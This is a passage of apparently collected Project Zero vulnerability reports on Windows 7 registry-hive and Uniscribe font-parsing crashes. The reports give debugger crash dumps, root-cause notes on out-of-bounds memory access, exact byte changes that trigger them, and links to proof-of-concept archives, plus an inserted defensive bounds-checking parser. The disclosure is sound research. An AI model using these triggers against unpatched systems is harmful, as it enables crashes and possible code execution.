the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000022, 
Arg2: a9c14000
Arg3: 00000001
Arg4: 00000000

[...]

STACK_TEXT:  
a353b688 81760bf9 a9c14000 a353b6c0 a353b6b4 nt!ExpFindAndRemoveTagBigPages+0x1fd
a353b6f8 8184d349 a9c14000 00000000 a353b73c nt!ExFreePoolWithTag+0x13f
a353b708 818d48d9 a9c14000 00001000 a87bcfd8 nt!CmpFree+0x17
a353b73c 8180f13e 00000001 80000560 80000548 nt!HvFreeHive+0x125
a353b798 817e2fac a353b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a353b85c 817e3d91 a353bbb8 00000000 a353b9f4 nt!CmpInitHiveFromFile+0x1be
a353b9c0 817ebaba a353bbb8 a353ba88 a353ba0c nt!CmpCmdHiveOpen+0x50
a353bacc 817e43c4 a353bb90 a353bbb8 00000010 nt!CmLoadKey+0x459
a353bc0c 8167adb6 002bf614 00000000 00000010 nt!NtLoadKeyEx+0x56c
a353bc0c 77a36c74 002bf614 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002bf67c 00000000 00000000 00000000 00000000 0x77a36c74
---

The issue reproduces on Windows 7 32- and 64-bit, and manifests itself both with and without Special Pools (but it is still advised to have the mechanism enabled). In order to reproduce the problem with the provided samples, it is necessary to load them with a dedicated program which calls the RegLoadAppKey() API.

The root cause of the crashes is unknown. It must be noted that in our test environment, reproduction has been very unreliable: the same hive could crash the system in one run, and then parse fine (or fail with an error) in 10 subsequent runs. In order to facilitate reproduction, I'm providing a high number of testcases which were seen to cause a bugcheck once or more, in hope that at least one of them will also reproduce externally.

################################################################################

On November 29, MSRC let us know that they were unable to reproduce a crash with the provided samples and report, and asked for more information and/or kernel crash dumps.

One day later, we've looked into the bug again and discovered that it wasn't sufficient to just load a single corrupted hive to trigger the bugcheck: instead, it is necessary to sequentially load several corrupted hives from the same path in the filesystem. MSRC confirmed that they could reliably reproduce the problem with this new information.

Since the additional detail is crucial to observe the symptoms of the bug and it was not included in the original report, I'm resetting the "Reported" date to November 30.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41645.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1019

We have encountered a crash in the Windows Uniscribe user-mode library, in the usp10!otlChainRuleSetTable::rule function, while trying to display text using a corrupted TTF font file:

---
(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????

0:000> kb
ChildEBP RetAddr  Args to Child              
0026ec2c 752382f3 0026ecac 00001b9f 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 75231471 42555347 0026f078 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 752335e1 000000e4 0026f078 0026f09c USP10!ApplyLookup+0x261
0026ef4c 7522f29f 42555347 0026f0b4 0026f078 USP10!ApplyFeatures+0x481
0026ef98 7522f710 00000000 09342ffa 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 752213c0 0026f050 0026f088 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 7521548a 0026f35c 0026f388 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 7521253f 0026f35c 0026f388 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 751e5c6f 2d011da2 09316124 09316318 USP10!ShlShape+0x2ef
0026f440 751f167a 2d011da2 09316124 09316318 USP10!ScriptShape+0x15f
0026f4a0 751f2b14 00000000 00000000 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 751f2da2 00000000 00000000 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 751f4339 00000000 0026f520 09316124 USP10!RenderItem+0x22
0026f534 751e7a04 000004a0 00000400 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 76ca5465 2d011da2 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 76ca5172 2d011da2 0026fa1c 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 76ca1410 2d011da2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 763c18b0 2d011da2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0026f708 763c22bf 2d011da2 00000048 00000000 USER32!DT_DrawStr+0x13c
0026f754 763c21f2 2d011da2 0026fa1c 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 763c14d4 2d011da2 00000000 0000000a USER32!DrawTextExWorker+0x255
0026f824 763c2475 2d011da2 0026fa1c ffffffff USER32!DrawTextExW+0x1e
[...]
---

The crash is caused by a single-byte change in a legitimate font file: at offset 0x845A, byte 0x00 is changed to 0xFF. The data region corresponds to the "GSUB" sfnt table. The change causes the otlChainRuleTable::backtrackGlyphCount() function to return an overly large 16-bit integer of 0xED00, which is then used as the number of iterations in a subsequent loop in the otlChainingLookup::apply() function, without prior validation. Increasing (out-of-bounds) indexes are then passed to otlChainRuleSetTable::rule() in the 2nd parameter, and used to address an array of 16-bit indexes. This is where the crash takes place, as the large index eventually starts pointing into the boundary of the last mapped heap memory page.

The 16-bit value read from outside the allocated buffer is later used as yet another index to address an array in the otlChainRuleTable::otlChainRuleTable() routine. While the function only appears to read from the newly formed pointer at first glance, we are not ruling out the possibility of memory corruption. In a read-only scenario, the issue could be potentially used to disclose sensitive data from the process heap.
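The validation missing from the path described above, as an added Python example (not Uniscribe code): every count field in an OpenType GSUB ChainRule (backtrack, input, lookahead and substitution records) is checked against the bytes actually present before any loop runs on it, so a count such as 0xED00 is refused instead of driving an out-of-bounds index. The table layout is the public OpenType ChainContextSubst format 1 ChainRule; the sample bytes are constructed here, with the corrupt copy carrying the backtrackGlyphCount value the report cites.

```python
"""Bounds-checked reader for a GSUB ChainRule table (added example)."""
import struct


class FontFormatError(ValueError):
    pass


def _u16(buf: bytes, off: int):
    if off + 2 > len(buf):
        raise FontFormatError(f"truncated uint16 at offset {off}")
    return struct.unpack_from(">H", buf, off)[0], off + 2


def _u16_array(buf: bytes, off: int, count: int, what: str):
    """Read `count` uint16 values only if that many actually fit in the buffer."""
    need = 2 * count
    if off + need > len(buf):
        raise FontFormatError(f"{what}: count {count} needs {need} bytes, "
                              f"{len(buf) - off} remain")
    values = list(struct.unpack_from(f">{count}H", buf, off)) if count else []
    return values, off + need


def parse_chain_rule(buf: bytes, off: int = 0):
    """Decode one ChainRule; returns (rule dict, offset just past it)."""
    backtrack_count, off = _u16(buf, off)
    backtrack, off = _u16_array(buf, off, backtrack_count, "backtrackSequence")
    input_count, off = _u16(buf, off)
    if input_count < 1:
        raise FontFormatError("inputGlyphCount must be at least 1")
    # the first input glyph is implied by the coverage table, so count-1 entries follow
    input_seq, off = _u16_array(buf, off, input_count - 1, "inputSequence")
    lookahead_count, off = _u16(buf, off)
    lookahead, off = _u16_array(buf, off, lookahead_count, "lookaheadSequence")
    subst_count, off = _u16(buf, off)
    raw, off = _u16_array(buf, off, 2 * subst_count, "substLookupRecords")
    records = list(zip(raw[0::2], raw[1::2]))   # (glyphSequenceIndex, lookupListIndex)
    for seq_index, _lookup in records:
        if seq_index >= input_count:
            raise FontFormatError(f"substLookupRecord index {seq_index} outside input sequence")
    return {"backtrack": backtrack, "input": input_seq,
            "lookahead": lookahead, "subst": records}, off


def is_well_formed_rule(buf: bytes) -> bool:
    try:
        parse_chain_rule(buf)
        return True
    except FontFormatError:
        return False


# constructed: backtrack [0x10], input count 2 ([0x20]), no lookahead, one record (0, 5)
GOOD_RULE = bytes.fromhex("00010010000200200000000100000005")
# same rule with backtrackGlyphCount patched to 0xED00
CORRUPT_RULE = b"\xed\x00" + GOOD_RULE[2:]

if __name__ == "__main__":
    print(parse_chain_rule(GOOD_RULE))
    try:
        parse_chain_rule(CORRUPT_RULE)
    except FontFormatError as exc:
        print("rejected:", exc)
```

The same discipline applies to every offset and count in the GSUB/GPOS tables: a parser that validates counts against the remaining length at each level never hands an unchecked iteration bound to the code that walks the arrays.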

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with the original and modified TTF files.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41646.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1022

We have encountered a crash in the Windows Uniscribe user-mode library, in the memmove() function called by USP10!otlList::insertAt, while trying to display text using a corrupted font file:

---
(4b44.24a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=093bc154 ebx=0943c104 ecx=00000012 edx=00000000 esi=093bc10c edi=0943c104
eip=76bc9f40 esp=001ee9b4 ebp=001ee9bc iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
msvcrt!memmove+0x5a:
76bc9f40 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr  Args to Child              
001ee9bc 7522e87a 0943c104 093bc10c 00000048 msvcrt!memmove+0x5a
001ee9dc 752358bd 00000002 ffffffff 00000001 USP10!otlList::insertAt+0x3a
001ee9f8 7523a414 001eee10 001eee34 00000002 USP10!InsertGlyphs+0x1d
001eea3c 75239676 001eee10 001eee34 001eed24 USP10!SubstituteNtoM+0x224
001eea7c 75231393 001eee10 001eee34 001eed24 USP10!otlMultiSubstLookup::apply+0xf6
001eeae0 752335e1 00000000 001eee10 001eee34 USP10!ApplyLookup+0x183
001eece4 7522f29f 42555347 001eee4c 001eee10 USP10!ApplyFeatures+0x481
001eed30 7522f710 00000000 093da000 093d9b58 USP10!SubstituteOtlGlyphs+0x1bf
001eed6c 752213c0 001eede8 001eee20 001eee4c USP10!SubstituteOtlChars+0x220
001eefe8 7521548a 001ef0f4 001ef120 001ef108 USP10!HebrewEngineGetGlyphs+0x690
001ef0a8 7521253f 001ef0f4 001ef120 001ef108 USP10!ShapingGetGlyphs+0x36a
001ef190 751e5c6f 86011dce 093b6124 093b6318 USP10!ShlShape+0x2ef
001ef1d4 751f167a 86011dce 093b6124 093b6318 USP10!ScriptShape+0x15f
001ef234 751f2b14 00000000 00000000 001ef2b4 USP10!RenderItemNoFallback+0xfa
001ef260 751f2da2 00000000 00000000 001ef2b4 USP10!RenderItemWithFallback+0x104
001ef284 751f4339 00000000 001ef2b4 093b6124 USP10!RenderItem+0x22
001ef2c8 751e7a04 000004a0 00000400 86011dce USP10!ScriptStringAnalyzeGlyphs+0x1e9
001ef2e0 76ca5465 86011dce 093b6040 0000000a USP10!ScriptStringAnalyse+0x284
001ef32c 76ca5172 86011dce 001ef714 0000000a LPK!LpkStringAnalyse+0xe5
001ef428 76ca1410 86011dce 00000000 00000000 LPK!LpkCharsetDraw+0x332
001ef45c 763c18b0 86011dce 00000000 00000000 LPK!LpkDrawTextEx+0x40
001ef49c 763c22bf 86011dce 00000058 00000000 USER32!DT_DrawStr+0x13c
001ef4e8 763c21f2 86011dce 001ef714 001ef728 USER32!DT_GetLineBreak+0x78
001ef594 763c14d4 86011dce 00000000 0000000a USER32!DrawTextExWorker+0x255
001ef5b8 763c2475 86011dce 001ef714 ffffffff USER32!DrawTextExW+0x1e
001ef5ec 013abcec 86011dce 001ef714 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
093bc10c  00000b45 00010001 00000b46 00010002
093bc11c  00000b47 00010003 00000b48 00010004
093bc12c  00000b49 00010005 00000b4a 00010006
093bc13c  00000b4b 00010007 00000b4c 00010008
093bc14c  00000b4d 00010009 000b0000 67696c63
093bc15c  00000001 000b0000 00000001 000000f8
093bc16c  00000048 001104bd 00010000 00000b26
093bc17c  00010001 00000b27 00010002 00000b28
0:000> dd edi
0943c104  ???????? ???????? ???????? ????????
0943c114  ???????? ???????? ???????? ????????
0943c124  ???????? ???????? ???????? ????????
0943c134  ???????? ???????? ???????? ????????
0943c144  ???????? ???????? ???????? ????????
0943c154  ???????? ???????? ???????? ????????
0943c164  ???????? ???????? ???????? ????????
0943c174  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41647.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1023

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!AssignGlyphTypes function, while trying to display text using a corrupted font file:

---
(58d0.5ae4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0042f2cc ebx=00000001 ecx=00000091 edx=00000091 esi=095c0004 edi=000007e1
eip=75235699 esp=0042ef8c ebp=0042ef98 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e          movzx   ecx,word ptr [esi]       ds:002b:095c0004=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0042ef98 75233660 0042f2cc 095dfc86 0000f81e USP10!AssignGlyphTypes+0x79
0042f17c 7522f29f 42555347 0042f2e4 0042f2a8 USP10!ApplyFeatures+0x500
0042f1c8 7522f710 00000000 095e0000 095dfc78 USP10!SubstituteOtlGlyphs+0x1bf
0042f204 752213c0 0042f280 0042f2b8 0042f2e4 USP10!SubstituteOtlChars+0x220
0042f480 7521548a 0042f58c 0042f5b8 0042f5a0 USP10!HebrewEngineGetGlyphs+0x690
0042f540 7521253f 0042f58c 0042f5b8 0042f5a0 USP10!ShapingGetGlyphs+0x36a
0042f628 751e5c6f 1b01233b 095b6124 095b6318 USP10!ShlShape+0x2ef
0042f66c 751f167a 1b01233b 095b6124 095b6318 USP10!ScriptShape+0x15f
0042f6cc 751f2b14 00000000 00000000 0042f74c USP10!RenderItemNoFallback+0xfa
0042f6f8 751f2da2 00000000 00000000 0042f74c USP10!RenderItemWithFallback+0x104
0042f71c 751f4339 00000000 0042f74c 095b6124 USP10!RenderItem+0x22
0042f760 751e7a04 000004a0 00000400 1b01233b USP10!ScriptStringAnalyzeGlyphs+0x1e9
0042f778 76ca5465 1b01233b 095b6040 0000000a USP10!ScriptStringAnalyse+0x284
0042f7c4 76ca5172 1b01233b 0042fbac 0000000a LPK!LpkStringAnalyse+0xe5
0042f8c0 76ca1410 1b01233b 00000000 00000000 LPK!LpkCharsetDraw+0x332
0042f8f4 763c18b0 1b01233b 00000000 00000000 LPK!LpkDrawTextEx+0x40
0042f934 763c22bf 1b01233b 000000b0 00000000 USER32!DT_DrawStr+0x13c
0042f980 763c21f2 1b01233b 0042fbac 0042fbc0 USER32!DT_GetLineBreak+0x78
0042fa2c 763c14d4 1b01233b 00000000 0000000a USER32!DrawTextExWorker+0x255
0042fa50 763c2475 1b01233b 0042fbac ffffffff USER32!DrawTextExW+0x1e
0042fa84 013b6a5c 1b01233b 0042fbac ffffffff USER32!DrawTextW+0x4d
[...]
0:000> u
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e          movzx   ecx,word ptr [esi]
7523569c b8f0ff0000      mov     eax,0FFF0h
752356a1 66214602        and     word ptr [esi+2],ax
752356a5 51              push    ecx
752356a6 8d4d0c          lea     ecx,[ebp+0Ch]
752356a9 e852420000      call    USP10!otlClassDef::getClass (75239900)
752356ae 66094602        or      word ptr [esi+2],ax
752356b2 eb09            jmp     USP10!AssignGlyphTypes+0x9d (752356bd)
0:000> dd esi
095c0004  ???????? ???????? ???????? ????????
095c0014  ???????? ???????? ???????? ????????
095c0024  ???????? ???????? ???????? ????????
095c0034  ???????? ???????? ???????? ????????
095c0044  ???????? ???????? ???????? ????????
095c0054  ???????? ???????? ???????? ????????
095c0064  ???????? ???????? ???????? ????????
095c0074  ???????? ???????? ???????? ????????
---

While the immediate crash is caused by an invalid memory read operation, the function subsequently writes to the same out-of-bounds memory in the instructions at 0x752356a1 and 0x752356ae (the `and` and `or` to `word ptr [esi+2]` in the disassembly above), leading to memory corruption and potential remote code execution.

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41648.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1025

We have encountered a crash in the Windows Uniscribe user-mode library, in the memset() function called by USP10!otlCacheManager::GlyphsSubstituted, while trying to display text using a corrupted font file:

---
(449c.6338): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=092ac250 ebx=092ac230 ecx=00000784 edx=00000074 esi=0028ea6c edi=092affd0
eip=76bc9c8d esp=0028e978 ebp=0028e97c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
msvcrt!_VEC_memcpy+0x116:
76bc9c8d 660f7f4730      movdqa  xmmword ptr [edi+30h],xmm0 ds:002b:092b0000=????????????????????????????????
0:000> kb
ChildEBP RetAddr  Args to Child              
0028e97c 76bc9c39 092ac250 0003ff80 00000006 msvcrt!_VEC_memcpy+0x116
0028e99c 76bc9cde 092ac250 00000000 0003fff4 msvcrt!_VEC_memzero+0x36
0028e9c0 75234b58 092ac248 00000000 0003fffc msvcrt!_VEC_memzero+0x82
0028e9e0 752336a1 0028ed18 00000006 0000ffff USP10!otlCacheManager::GlyphsSubstituted+0xc8
0028ebc0 7522f29f 42555347 0028ed58 0028ece4 USP10!ApplyFeatures+0x541
0028ec0c 7522b083 00000000 092c6ffc 092c6e18 USP10!SubstituteOtlGlyphs+0x1bf
0028ec38 75223921 0028ecb4 0028ed0c 0028ed58 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0028eed0 7521548a 0028efdc 0028f008 0028eff0 USP10!ArabicEngineGetGlyphs+0x891
0028ef90 7521253f 0028efdc 0028f008 0028eff0 USP10!ShapingGetGlyphs+0x36a
0028f078 751e5c6f 2a0123f2 092a6124 092a6318 USP10!ShlShape+0x2ef
0028f0bc 751f167a 2a0123f2 092a6124 092a6318 USP10!ScriptShape+0x15f
0028f11c 751f2b14 00000000 00000000 0028f19c USP10!RenderItemNoFallback+0xfa
0028f148 751f2da2 00000000 00000000 0028f19c USP10!RenderItemWithFallback+0x104
0028f16c 751f4339 00000000 0028f19c 092a6124 USP10!RenderItem+0x22
0028f1b0 751e7a04 000004a0 00000400 2a0123f2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0028f1c8 76ca5465 2a0123f2 092a6040 0000000a USP10!ScriptStringAnalyse+0x284
0028f214 76ca5172 2a0123f2 0028f5fc 0000000a LPK!LpkStringAnalyse+0xe5
0028f310 76ca1410 2a0123f2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0028f344 763c18b0 2a0123f2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0028f384 763c22bf 2a0123f2 00000070 00000000 USER32!DT_DrawStr+0x13c
0028f3d0 763c21f2 2a0123f2 0028f5fc 0028f610 USER32!DT_GetLineBreak+0x78
0028f47c 763c14d4 2a0123f2 00000000 0000000a USER32!DrawTextExWorker+0x255
0028f4a0 763c2475 2a0123f2 0028f5fc ffffffff USER32!DrawTextExW+0x1e
0028f4d4 01336a5c 2a0123f2 0028f5fc ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd edi
092affd0  00000000 00000000 00000000 00000000
092affe0  00000000 00000000 00000000 00000000
092afff0  00000000 00000000 00000000 00000000
092b0000  ???????? ???????? ???????? ????????
092b0010  ???????? ???????? ???????? ????????
092b0020  ???????? ???????? ???????? ????????
092b0030  ???????? ???????? ???????? ????????
092b0040  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 2 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41649.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1026&desc=2

We have encountered a crash in the Windows Uniscribe user-mode library, in the memcpy() function called by USP10!MergeLigRecords, while trying to display text using a corrupted font file:

---
(2bd0.637c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0929a000 ebx=09299fa0 ecx=00000009 edx=00000002 esi=09299fda edi=092b7914
eip=76bc9b60 esp=0015f534 ebp=0015f53c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
msvcrt!memcpy+0x5a:
76bc9b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr  Args to Child              
0015f53c 751f777d 092b7914 09299fda 00000026 msvcrt!memcpy+0x5a
0015f554 751f74e9 0928ffd0 0928f9d0 0015f5f0 USP10!MergeLigRecords+0x14d
0015f5b4 751f7044 0000001a 09223d88 09233fa8 USP10!LoadTTOArabicShapeTables+0x3f9
0015f5c8 751fc5f4 a60118b0 09223d88 09216124 USP10!LoadArabicShapeTables+0xd4
0015f5e4 751ea5a0 a60118b0 0928f7d0 0000001a USP10!ArabicLoadTbl+0xd4
0015f608 751ea692 09216124 a60118b0 0000001a USP10!UpdateCache+0xb0
0015f61c 751f152d a60118b0 09216000 751f15db USP10!ScriptCheckCache+0x62
0015f628 751f15db 00000001 00000001 092162e8 USP10!GetShapeFunction+0xd
0015f660 751f2b14 00000001 00000000 0015f6e0 USP10!RenderItemNoFallback+0x5b
0015f68c 751f2da2 00000001 00000000 0015f6e0 USP10!RenderItemWithFallback+0x104
0015f6b0 751f4339 00000000 0015f6e0 09216124 USP10!RenderItem+0x22
0015f6f4 751e7a04 000004a0 00000400 a60118b0 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0015f70c 76ca5465 a60118b0 09216040 0000000a USP10!ScriptStringAnalyse+0x284
0015f758 76ca5172 a60118b0 0015fb40 0000000a LPK!LpkStringAnalyse+0xe5
0015f854 76ca1410 a60118b0 00000000 00000000 LPK!LpkCharsetDraw+0x332
0015f888 763c18b0 a60118b0 00000000 00000000 LPK!LpkDrawTextEx+0x40
0015f8c8 763c22bf a60118b0 000000c0 00000000 USER32!DT_DrawStr+0x13c
0015f914 763c21f2 a60118b0 0015fb40 0015fb54 USER32!DT_GetLineBreak+0x78
0015f9c0 763c14d4 a60118b0 00000000 0000000a USER32!DrawTextExWorker+0x255
0015f9e4 763c2475 a60118b0 0015fb40 ffffffff USER32!DrawTextExW+0x1e
0015fa18 010e6a5c a60118b0 0015fb40 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
09299fda  03e003df 03df03ea 03df0382 03df0384
09299fea  03df0388 03e0038e 03e00382 03e00384
09299ffa  03e00388 ???????? ???????? ????????
0929a00a  ???????? ???????? ???????? ????????
0929a01a  ???????? ???????? ???????? ????????
0929a02a  ???????? ???????? ???????? ????????
0929a03a  ???????? ???????? ???????? ????????
0929a04a  ???????? ???????? ???????? ????????
0:000> dd edi
092b7914  ???????? ???????? ???????? ????????
092b7924  ???????? ???????? ???????? ????????
092b7934  ???????? ???????? ???????? ????????
092b7944  ???????? ???????? ???????? ????????
092b7954  ???????? ???????? ???????? ????????
092b7964  ???????? ???????? ???????? ????????
092b7974  ???????? ???????? ???????? ????????
092b7984  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is a proof of concept malformed font file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41650.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1027

We have encountered a crash in the Windows Uniscribe user-mode library, in an unnamed function called by USP10!ttoGetTableData, while trying to display text using a corrupted font file:

---
(46ac.5f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0945afce ebx=00000100 ecx=09463000 edx=00000004 esi=0945afba edi=0946006b
eip=75202dae esp=0059f634 ebp=0059f668 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!ttoGetTableData+0xc4e:
75202dae 668939          mov     word ptr [ecx],di        ds:002b:09463000=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0059f668 75202bf8 0945af96 09462fb8 0059f688 USP10!ttoGetTableData+0xc4e
0059f690 752021b1 09462fb8 09462fb8 0945ad42 USP10!ttoGetTableData+0xa98
0059f6a4 751f7274 09458fd0 094589d0 0059f734 USP10!ttoGetTableData+0x51
0059f704 751f7044 0000001a 093f3d88 09401fa8 USP10!LoadTTOArabicShapeTables+0x184
0059f718 751fc638 51010f6c 093f3d88 0059f744 USP10!LoadArabicShapeTables+0xd4
0059f728 751fc5c8 51010f6c 094587d0 093e6124 USP10!ArabicSimpleLoadTbl+0x28
0059f744 751ea5a0 51010f6c 751e5348 0000001a USP10!ArabicLoadTbl+0xa8
0059f76c 751ea692 093e6124 51010f6c 0000001a USP10!UpdateCache+0xb0
0059f780 751f152d 51010f6c 093e6000 751f15db USP10!ScriptCheckCache+0x62
0059f78c 751f15db 00000001 00000001 00000000 USP10!GetShapeFunction+0xd
0059f7c4 751f2b14 00000001 00000001 0059f844 USP10!RenderItemNoFallback+0x5b
0059f7f0 751f2da2 00000001 00000001 0059f844 USP10!RenderItemWithFallback+0x104
0059f814 751f4339 00000001 0059f844 093e6124 USP10!RenderItem+0x22
0059f858 751e7a04 000004a0 00000400 51010f6c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0059f870 76ca5465 51010f6c 093e6040 0000000a USP10!ScriptStringAnalyse+0x284
0059f8bc 76ca5172 51010f6c 0059fca4 0000000a LPK!LpkStringAnalyse+0xe5
0059f9b8 76ca1410 51010f6c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0059f9ec 763c18b0 51010f6c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0059fa2c 763c22bf 51010f6c 00000070 00000000 USER32!DT_DrawStr+0x13c
0059fa78 763c21f2 51010f6c 0059fca4 0059fcb8 USER32!DT_GetLineBreak+0x78
0059fb24 763c14d4 51010f6c 00000000 0000000a USER32!DrawTextExWorker+0x255
0059fb48 763c2475 51010f6c 0059fca4 ffffffff USER32!DrawTextExW+0x1e
0059fb7c 00336a5c 51010f6c 0059fca4 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd ecx
09463000  ???????? ???????? ???????? ????????
09463010  ???????? ???????? ???????? ????????
09463020  ???????? ???????? ???????? ????????
09463030  ???????? ???????? ???????? ????????
09463040  ???????? ???????? ???????? ????????
09463050  ???????? ???????? ???????? ????????
09463060  ???????? ???????? ???????? ????????
09463070  ???????? ???????? ???????? ????????
0:000> !heap -p -a ecx
    address 09463000 found in
    _DPH_HEAP_ROOT @ 93e1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 93e2fa4:          9462fb8               48 -          9462000             2000
    5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
    7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
    774e3431 ntdll!RtlAllocateHeap+0x0000023a
    5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
    751f6644 USP10!UspAllocCache+0x00000054
    751f725b USP10!LoadTTOArabicShapeTables+0x0000016b
    751f7044 USP10!LoadArabicShapeTables+0x000000d4
    751fc638 USP10!ArabicSimpleLoadTbl+0x00000028
    751fc5c8 USP10!ArabicLoadTbl+0x000000a8
    751ea5a0 USP10!UpdateCache+0x000000b0
    751ea692 USP10!ScriptCheckCache+0x00000062
    751f152d USP10!GetShapeFunction+0x0000000d
    751f2b14 USP10!RenderItemWithFallback+0x00000104
    751f2da2 USP10!RenderItem+0x00000022
    751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
    751e7a04 USP10!ScriptStringAnalyse+0x00000284
    76ca5465 LPK!LpkStringAnalyse+0x000000e5
    76ca5172 LPK!LpkCharsetDraw+0x00000332
    76ca1410 LPK!LpkDrawTextEx+0x00000040
    763c18b0 USER32!DT_DrawStr+0x0000013c
    763c22bf USER32!DT_GetLineBreak+0x00000078
    763c21f2 USER32!DrawTextExWorker+0x00000255
    763c14d4 USER32!DrawTextExW+0x0000001e
    763c2475 USER32!DrawTextW+0x0000004d
[...]
---

